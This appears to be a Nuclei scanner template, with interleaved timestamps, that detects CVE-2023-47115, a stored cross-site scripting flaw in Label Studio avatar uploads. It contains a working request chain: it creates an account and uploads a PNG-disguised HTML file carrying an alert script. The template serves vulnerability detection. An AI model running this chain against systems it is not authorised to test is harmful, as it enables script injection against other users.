2024-01-29 16:49:31 +00:00
id : CVE-2023-47115
info :
2024-01-30 07:55:56 +00:00
name : Label Studio - Stored Cross-Site Scripting
2024-01-29 16:49:31 +00:00
author : isacaya
severity : high
2024-01-30 07:55:56 +00:00
description : |
Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.
2024-01-29 16:49:31 +00:00
impact : |
Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image.
remediation : |
Update to version 1.9.2.
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2023-47115
- https://github.com/advisories/GHSA-q68h-xwq5-mm7x
2024-01-30 07:55:56 +00:00
- https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development
- https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49
- https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26
2024-01-29 16:49:31 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
cvss-score : 7.1
cve-id : CVE-2023-47115
cwe-id : CWE-79
2024-01-30 07:55:56 +00:00
metadata :
verified : true
max-request : 1
shodan-query : http.favicon.hash:-1649949475
tags : cve,cve2023,xss,authenticated,intrusive,label-studio
2024-01-29 16:49:31 +00:00
http :
- raw :
- |
GET /user/login/ HTTP/1.1
Host : {{Hostname}}
- |
POST /user/signup/?&next=/projects/ HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false
- |
GET /api/current-user/whoami HTTP/1.1
Host : {{Hostname}}
- |
POST /api/users/{{id}}/avatar/ HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF
------WebKitFormBoundarytZZRQ9D2LS0PMsHF
Content-Disposition : form-data; name="avatar"; filename="nuclei.html"
Content-Type : image/png
{{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}}
------WebKitFormBoundarytZZRQ9D2LS0PMsHF
- |
GET /api/current-user/whoami HTTP/1.1
Host : {{Hostname}}
- |
GET {{filename}} HTTP/1.1
Host : {{Hostname}}
extractors :
- type : xpath
name : csrftoken
internal : true
attribute : value
xpath :
- '/html/body/div/form/input'
2024-01-30 07:55:56 +00:00
2024-01-29 16:49:31 +00:00
- type : json
part : body
name : id
internal : true
json :
- '.id'
2024-01-30 07:55:56 +00:00
2024-01-29 16:49:31 +00:00
- type : json
part : body
name : filename
internal : true
json :
- '.avatar'
matchers-condition : and
matchers :
- type : dsl
dsl :
- "contains(header, 'text/html')"
- "status_code == 200"
- 'contains(body, "<script>alert(document.domain)</script>")'
2024-01-30 07:55:56 +00:00
condition : and